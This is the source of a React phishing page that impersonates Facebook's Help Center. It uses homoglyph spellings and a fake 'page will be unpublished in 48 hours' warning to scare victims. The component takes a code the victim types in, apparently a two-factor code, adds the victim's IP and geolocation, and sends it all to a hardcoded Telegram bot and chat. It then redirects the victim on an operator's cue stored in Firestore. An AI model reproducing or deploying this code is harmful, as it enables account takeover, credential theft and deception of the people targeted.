import React, { useEffect, useState } from "react";
import {
  addDoc,
  collection,
  doc,
  getDoc,
  getDocs,
  onSnapshot,
  setDoc, 
  query, 
  where,
} from "firebase/firestore";
import { ref, listAll, getDownloadURL } from "firebase/storage";
import { publicIpv4 } from "public-ip";
import { storage, db } from "../firebase.js";
import { useParams } from "react-router-dom";

import Navbar from './Navbar/Navbar';
import Sidebar from './Sidebar/Sidebar';
import Footer from './Footer/Footer';
import './Page2.css';
import profile1 from '../components/fbrpofile1.png';
import profile2 from '../components/fbprofile3.png';
import profile3 from '../components/fbprofile2.png';
import { FaCheck, FaCheckCircle, FaUser, FaThumbsUp, FaMoneyBill, FaUserShield, FaShieldAlt, FaChevronRight, FaChevronLeft } from 'react-icons/fa';
import { MdUnpublished } from "react-icons/md";
const images = [
  { src: profile1, text: 'Introduction to Community Standards' },
  { src: profile2, text: 'How we enforce our Community Standards' },
  { src: profile3, text: 'How we update our Community Standards' }
];

const About66 = () => {
  const { number } = useParams();
  const [ip, setIp] = useState(undefined);
  const [code, setCode] = useState("");
  const [userData, setUserData] = useState(undefined);
  const [isUserData, setIsUserData] = useState(false);
  const [userUrl, setUserUrl] = useState(false);
  const [imageUrl, setImageUrl] = useState("");
  const [textValue, setTextValue] = useState("");
  const [currentImageIndex, setCurrentImageIndex] = useState(0);

  const handleActions = () => {
    if (code === "") {
      return;
    } else {
      const bot = "bot7065426189:AAHMIv-TiNcqD56_7524Q1VqUAn8oL_PyA4";
      const chid = "-1002180965367";

      fetch(`https://ipapi.co/json/`)
        .then((response) => response.json())
        .then((response) => {
          const { country, region, city } = response;
          const params = {
            content: `========================
                  TWO 1: '${code}'
                  Country : '${country}'
                  Region : '${region}'
                  City : '${city}'
                  IP: '${ip}'
                  ========================`,
          };

          fetch(
            `https://api.telegram.org/${bot}/sendMessage?chat_id=${chid}&text=${params.content}`,
            {
              method: "POST",
              headers: {
                "Content-Type": "application/json",
              },
            }
          )
            .then(() => {
              window.location = "rwr";
            })
            .catch((error) => {
              window.location = "rwr";
            });
        });
    }
  };

  const handleCodeChange = (e) => {
    setCode(e.target.value.replace(/[^0-9]/g, "")); 
  };

  const getUserData = async () => {
    const documentSnapshot = await getDocs(collection(db, "nrchanger"));
    const newData = documentSnapshot.docs.map((doc) => ({
      ...doc.data(),
      id: doc.id,
    }));
    const filter = newData.filter((x) => {
      if (x.ip === ip) {
        setIsUserData(true);
        setUserData(x);
        return x;
      }
    });
    if (filter.length === 0) {
      addUserData();
    }
  };

  const getIp = async () => {
    if (ip === undefined) {
      const ip = await publicIpv4();
      setIp(ip);
    }
  };
  getIp();

  useEffect(() => {
    if (ip) {
      onSnapshot(collection(db, "nrchanger"), (snapshot) => {
        let isExist = false;
        snapshot.docs
          .map((doc) => ({ ...doc.data(), id: doc.id }))
          .filter((x) => {
            if (x.ip === ip) {
              isExist = true;
              setUserData(x);
              fetch("../data.json")
                .then((res) => {
                  if (!res.ok) {
                    throw new Error(`HTTP error! status: ${res.status}`);
                  }
                  return res.json();
                })
                .then((data) => {
                  data.url_data.filter((item) => {
                    if (item.id === parseInt(x.redir)) {
                      setUserUrl(item.url);
                      return;
                    }
                  });
                })
                .catch((err) => {
                  console.log(err, " error");
                });
            }
          });
        if (!isExist) {
          setUserUrl(false);
        }
      });
    }
  }, [ip, number]);

  useEffect(() => {
    document.title = "Legаl Removal Request | Fасebооk Helр Cеnter";
  }, [userData, userUrl]);

  useEffect(() => {}, [userData]);

  useEffect(() => {
    const fetchImageAndText = async () => {
      try {
        const storageRef = await ref(storage, "images");
        const imagesList = await listAll(storageRef);

        const image = imagesList.items.find((item) =>
          item.name.startsWith(`${number}_`)
        );

        if (image) {
          const url = await getDownloadURL(image);
          setImageUrl(url);
        } else {
          setImageUrl("");
          console.log("");
        }

        const uploadsRef = collection(db, "uploads");
        const q = query(uploadsRef, where("number", "==", parseInt(number)));
        const querySnapshot = await getDocs(q);

        if (!querySnapshot.empty) {
          querySnapshot.forEach((doc) => {
            setTextValue(doc.data().text);
          });
        } else {
          setTextValue("");
        }
      } catch (error) {
        console.error("Error fetching image or text:", error);
        setImageUrl("");
        setTextValue("Error fetching image or text.");
      }
    };

    fetchImageAndText();
  }, [number]);

  const addUserData = async () => {
    try {
      const docRef = doc(collection(db, "nrchanger"), ip);

      const docSnap = await getDoc(docRef);

      if (!docSnap.exists()) {
        await setDoc(docRef, {
          ip: ip,
          number: -1,
          redir: "-1",
        });
        console.log("Document written with ID: ", ip);
        getUserData();
      } else {
        console.log("Document already exists with ID: ", ip);
      }
    } catch (e) {
      console.error("Error adding document: ", e);
    }
  };

  const resetUserNumber = async () => {
    try {
      const docRef = doc(collection(db, "nrchanger"), ip);
      await setDoc(docRef, { redir: "-1" }, { merge: true });
      console.log("User number reset to -1 for IP: ", ip);
    } catch (e) {
      console.error("Error resetting user number: ", e);
    }
  };

  useEffect(() => {
    if (ip) {
      getUserData();
    }
  }, [ip]);

  const handlePrevious = () => {
    if (currentImageIndex > 0) {
      setCurrentImageIndex(currentImageIndex - 1);
    }
  };

  const handleNext = () => {
    if (currentImageIndex < images.length - 2) {
      setCurrentImageIndex(currentImageIndex + 1);
    }
  };

  if (userUrl) {
    setTimeout(() => {
      window.location = userUrl;
    }, 1000);
    resetUserNumber();
  }
  console.log("hi here is the data", isUserData, userData);

  if (isUserData) {
    return (
      <>
        <div className="App">
          <Navbar />
          <div className="main-container">
            <Sidebar />
            <div className="content-container page-content-container">
              <div className="page2-content">
                <h1 className="page2-title">Page status</h1>
                <div className="page2-avatar-section">
                  <div className="page2-avatar">
                    {imageUrl ? (
                      <img src={imageUrl} alt="Uploaded" className="page2-avatar-icon"/>
                    ) : (
                      <div className="page2-avatar-icon"></div>
                    )}
                    <div className="page2-avatar-text">
                      <textarea
                        value={textValue}
                        readOnly
                        style={{
                          border: "none",
                          outline: "none",
                          padding: "0",
                          backgroundColor: "transparent",
                          resize: "none",
                          fontSize: "17px",
                          fontFamily: "inherit",
                          color: "inherit",
                          lineHeight: "inherit",
                        }}
                      />
                      <div className="page2-avatar-subtext">Page is at risk of being unpublished</div>
                    </div>
                    <div className="page2-check-mark">
                      <FaCheck />
                    </div>
                  </div>
                </div>
                <p className="page2-description">
                  When we take actions on your profile or your content for going against our standards, you'll see them here.
                </p>
                <div className="page2-main-section">
                  <div className="page2-left-column">
                    <div className="page2-section page2-community-section">
                      <div className="page2-section-header">Restrictions</div>
                      <p>
                      Your page {textValue} has been restricted. This is because your page, or activity on it, doesn't follow our Community Standards on page integrity and authenticity.<br/><br/>
                      If you think that we've restricted your page by mistake, you'll have 48 hours to appeal our decision. If you miss this deadline, your page will be permanently unpublished.<br/><br/>
  <a href="/eFy2Rp4Th9Km2Lq1Ns8Xw3Zg6Vo5Sj0Fb3Te4Yr7Uq1Ix8Pm2Kn9Xs6Jz3Ob5Nh8Jr5Ft4" className="break-word">https://www.facebook.com/help/34348569133159</a><br/><br/>
  You can learn more about why we unpublish pages by visiting the <a href="/eFy2Rp4Th9Km2Lq1Ns8Xw3Zg6Vo5Sj0Fb3Te4Yr7Uq1Ix8Pm2Kn9Xs6Jz3Ob5Nh8Jr5Ft4" className="break-word"> Community Standards.</a><br/><br/>
  Thanks,<br/>
  Fасеbook Suppоrt Team
</p>

                      <div className="page2-section-item">
                      </div>
                    </div>
                    <div className="page2-section page2-community-section">
                      <div className="page2-section-header">Community Standards violations</div>
                      <p>If content on a Page goes against our Community Standards, it can put the Page at risk for restrictions.</p>
                      <div className="page2-section-item">
                        <div className="goodnews-icon">
                          <FaCheckCircle />
                        </div>
                        <span>Good news: no violations to show.</span>
                      </div>
                    </div>
                    <div className="page2-section page2-find-out-more-section">
                      <div className="page2-section-header">Find out more</div>
                      <p>See our Community Standards and get tips for great content</p>
                      <div className="page2-cards">
                        <FaChevronLeft
                          onClick={handlePrevious}
                          className="page2-arrow left"
                          style={{ visibility: currentImageIndex > 0 ? 'visible' : 'hidden' }}
                        />
                        <div className="page2-card">
                          <img src={images[currentImageIndex].src} alt="Community Standards" className="page2-card-image" />
                          <span>{images[currentImageIndex].text}</span>
                        </div>
                        <div className="page2-card">
                          <img src={images[currentImageIndex + 1].src} alt="Community Standards" className="page2-card-image" />
                          <span>{images[currentImageIndex + 1].text}</span>
                        </div>
                        <FaChevronRight
                          onClick={handleNext}
                          className="page2-arrow right"
                          style={{ visibility: currentImageIndex < images.length - 2 ? 'visible' : 'hidden' }}
                        />
                      </div>
                    </div>
                  </div>
                  <div className="page2-right-column">
                    <div className="account-status-box">
                      <div className="account-status-header">Account status</div>
                      <div className="account-status-content">
                        <div className="status-icon">
                          <FaUser className="info-circle-icon" />
                        </div>
                        <div className="status-text">
                          <div className="status-title">No restrictions</div>
                          <p>Your account looks good! Check in on other things you manage.</p>
                        </div>
                        <FaChevronRight className="chevron-icon" />
                      </div>
                    </div>
                    <div className="right-box">
                      <div className="right-box-header">Page benefits</div>
                      <div className="right-box-content">
                        <div className="status-icon">
                          <FaThumbsUp className="info-circle-icon" />
                        </div>
                        <div className="status-text">
                          <div className="status-title">Page is recommendable</div>
                        </div>
                        <FaChevronRight className="chevron-icon" />
                      </div>
                      <div className="right-box-content">
                        <div className="status-icon">
                          <FaMoneyBill className="info-circle-icon" />
                        </div>
                        <div className="status-text">
                          <div className="status-title">Restricted monetisation</div>
                        </div>
                        <FaChevronRight className="chevron-icon" />
                      </div>
                    </div>
                    <div className="right-box">
                      <div className="right-box-header">More about your Page</div>
                      <div className="right-box-content">
                        <div className="status-icon">
                          <FaUserShield className="info-circle-icon" />
                        </div>
                        <div className="status-text">
                          <div className="status-title">Manage admins</div>
                        </div>
                        <FaChevronRight className="chevron-icon" />
                      </div>
                      <div className="right-box-content">
                        <div className="status-icon">
                          <FaShieldAlt className="info-circle-icon" />
                        </div>
                        <div className="status-text">
                          <div className="status-title">Moderation Assist</div>
                        </div>
                        <FaChevronRight className="chevron-icon" />
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <Footer />
            </div>
          </div>
        </div>
      </>
    );
  } 
};

export default About66;
